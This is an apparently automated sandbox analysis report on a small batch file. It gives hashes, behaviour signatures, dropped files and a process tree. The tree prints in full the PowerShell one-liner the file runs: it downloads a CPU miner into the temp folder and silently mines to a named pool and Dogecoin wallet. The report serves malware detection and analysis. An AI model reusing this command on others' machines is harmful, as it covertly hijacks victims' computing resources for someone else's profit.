b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb

Analysis

max time kernel
1797s
max time network
1797s
platform
windows10-1703_x64
resource
win10-20231220-ja
resource tags

arch:x64arch:x86image:win10-20231220-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
04/02/2024, 08:38

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

73u3Ito.bat
Size

499B
MD5

fe74bff27516829a88cfbc6f6e99646f
SHA1

0c15d859211c79910b277d07e729bec7197a60cd
SHA256

b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
SHA512

a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
2	3156	powershell.exe
4	3156	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3520	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3520	cpuminer-sse2.exe
3520	cpuminer-sse2.exe
3520	cpuminer-sse2.exe
3520	cpuminer-sse2.exe
3520	cpuminer-sse2.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
3156	powershell.exe
3156	powershell.exe
3156	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3156	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2492 wrote to memory of 3156	2492	cmd.exe	76
PID 2492 wrote to memory of 3156	2492	cmd.exe	76
PID 3156 wrote to memory of 4948	3156	powershell.exe	77
PID 3156 wrote to memory of 4948	3156	powershell.exe	77
PID 4948 wrote to memory of 3520	4948	cmd.exe	79
PID 4948 wrote to memory of 3520	4948	cmd.exe	79

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2492
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3156
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4948
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3520

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_av50ug42.qc0.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
1.0MB

MD5
06a9a4888b96c8c00773ff49497e13e5

SHA1
d8eeed868d47cab55316387f6f3b5a9caf6e70ef

SHA256
1f976398d0224107144cbbfb5a921e1467f28a03a9c165440d393da8924df7b6

SHA512
8f92fbdd6bef3adca78b91edaa0d29ad4c9e8918b0f8dfed15bb97ea3992a41b8fdb6eafd7b68e18b059f397201b54147b7c3c1605d66e6f8576904834ea247f

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
874KB

MD5
91e7428369432f4e855ffbb268caceb8

SHA1
8e7ddd7e3873ae802b5898f9c4384831bdb1bb03

SHA256
368a6495ee89484eae250dfb99c637a20e43dc9929c602b02da0305ac8e6fc68

SHA512
78f853e1151429e21cde87e377e0090375c0280004faf518fd2c34503614885d28f79c05a3ab2f34fed86b04063f98a49c8d236a46a98e59d3296e88842b1c93

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
645KB

MD5
43d06f58b33bb02b9f1fa3b1aa125173

SHA1
599660b8a3ecf0047ac89681c7ace4740ea9473d

SHA256
10987c3af697bca13fc1107af91300801c25255cefe1215c7aae7d387f125ae6

SHA512
f4bd6f7e7fb4da474c3554fb869d8f63193c400e6deafabfa48541a35461c0e6d898158c779f7165dda0473f5f61fc1da9b2163940fa9dd43aea9ff0e8966711

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
262KB

MD5
ce619afe6459c3e603c8044d73500d79

SHA1
442ebca51e3beaec97bc1ab1d6efeabb9367b7b7

SHA256
7a093d08037dff314782d0a0a218e440b84cb2c58a116744bd3be2b40b46e7d3

SHA512
b2f9e56e293e53d8c21de62b68abdfdcf92b09890dd58e58fc1d6f5fe157f41e6b9fdd9d6acfbb86e7b846d3e861c29c7ac7f34dac57099da3c2542ca84232d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
576KB

MD5
86fa745553c6a7f471c85c5ce365ead6

SHA1
ba032cb56d56256f21712ac7f10e3f1f82a0473e

SHA256
51dab02aa8ff100ef3f9b9952dbd7822b1d1cf7690d0305fb3e56d3d49fdfb9d

SHA512
f7a57de148e26ed1d110d4b5c277fb808c6e42b8639b3158eeb78d38010aa0523c9dd86b4585ad3d49ce4b960124c8aaaf82ea20e2858de4023995e8a1c25e9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
498KB

MD5
4627ee849d216384ab5ffefac2e52139

SHA1
958a1511b8fcb57975e5c8486c9155b906cd8d2d

SHA256
a96556e530b609964bcd8f419a28fdaf6bf06ba5b669c3bf4358d696509a6dca

SHA512
7cc1aa54746bd90d9caf6cb6beec2b37908678692610f437dea3824ab5cbb38a6a5fcb7eae40f720940325613ad05497f7f1a223256e9e1cd0eb9871feb404c5

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
435KB

MD5
b17046babb06efd26c61c2e123610aff

SHA1
b798e49b9c439c877eee4e6eaabb60cc0d945693

SHA256
e476d00a5acc5eeda988e20f782bdc4d2cf6644a747d805b2ad15e481a4e467a

SHA512
50ded99a9550e642f13c2b9b9557661f773f06a89c7b86ec80c4e7e2d4a7754689c66a3b0fc0a7681f2d6c7d015d450a65e08656ff75bb1c4e5cdb0b15ca4b39

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
466KB

MD5
b3dd4b74ff8a0f0268fcfdaa7fa23a1e

SHA1
53fd1092e1015b130abaa14cc846ee809d3dd851

SHA256
88c09b350eb5188303158a51bb08771b58ffd515d2e8b56a6fe37c1a4251f3bb

SHA512
020e512e07343f39012634bbeaf9d7c787010172576d59bf61ac71fd5a899e86801b48e9a59451aa6d12eba39fa9e3fb95196dd6b1df9bd723aa5969d3d87312

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
604KB

MD5
b003745fee28a0ab0eaf330e788c055e

SHA1
2233baec1efbd37c0ea3cf35c13034d02d0b858a

SHA256
a371237d5681457957f9b282c753165d42121cd17e89edf3aec4986c9ddb195b

SHA512
c3c5fd0a14071c8ebbc6cf690fc4501890ad18a110f1893e2d13c0c1713b9aefe6906b70204ad6151fced03b53497647a754780bcc69b14f3e73ece96491ed41

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
378KB

MD5
eb6889f51ea4ac7ff8fb22a5449144c9

SHA1
f66e27c7683b0a7fe3473c08377f8a0b81b64643

SHA256
67450472592ea9819196cf5d3d6bd53db518223034e9674f6b77ce0714b026b4

SHA512
d32cd77a47bc20d430b8547f58c04072a19440cd0be2239009dcb6ba1343530853d0b30077f74863aa7b2f9614d2600f148b2eefe6cb5bbc51ca4c5261d26cf0

Download Submit
memory/3156-31-0x00000245F0340000-0x00000245F0356000-memory.dmp

Filesize
88KB

Download
memory/3156-6-0x00000245EFEE0000-0x00000245EFF02000-memory.dmp

Filesize
136KB

Download
memory/3156-36-0x00000245EFE80000-0x00000245EFE90000-memory.dmp

Filesize
64KB

Download
memory/3156-56-0x00000245F04F0000-0x00000245F0502000-memory.dmp

Filesize
72KB

Download
memory/3156-69-0x00000245EFF20000-0x00000245EFF2A000-memory.dmp

Filesize
40KB

Download
memory/3156-112-0x00007FFAECF00000-0x00007FFAED8EC000-memory.dmp

Filesize
9.9MB

Download
memory/3156-34-0x00000245EFE80000-0x00000245EFE90000-memory.dmp

Filesize
64KB

Download
memory/3156-33-0x00007FFAECF00000-0x00007FFAED8EC000-memory.dmp

Filesize
9.9MB

Download
memory/3156-5-0x00007FFAECF00000-0x00007FFAED8EC000-memory.dmp

Filesize
9.9MB

Download
memory/3156-28-0x00000245EFE80000-0x00000245EFE90000-memory.dmp

Filesize
64KB

Download
memory/3156-13-0x00000245F0370000-0x00000245F03E6000-memory.dmp

Filesize
472KB

Download
memory/3156-10-0x00000245F01E0000-0x00000245F02EE000-memory.dmp

Filesize
1.1MB

Download
memory/3156-8-0x00000245EFE80000-0x00000245EFE90000-memory.dmp

Filesize
64KB

Download
memory/3156-9-0x00000245EFEC0000-0x00000245EFED0000-memory.dmp

Filesize
64KB

Download
memory/3156-4-0x00000245EFF30000-0x00000245EFFC2000-memory.dmp

Filesize
584KB

Download
memory/3156-35-0x00000245EFE80000-0x00000245EFE90000-memory.dmp

Filesize
64KB

Download
memory/3156-7-0x00000245EFE80000-0x00000245EFE90000-memory.dmp

Filesize
64KB

Download
memory/3520-140-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3520-175-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3520-126-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3520-125-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3520-129-0x0000000001060000-0x0000000002915000-memory.dmp

Filesize
24.7MB

Download
memory/3520-135-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3520-155-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3520-128-0x00000000536F0000-0x0000000053788000-memory.dmp

Filesize
608KB

Download
memory/3520-127-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3520-160-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3520-165-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3520-170-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3520-145-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3520-180-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download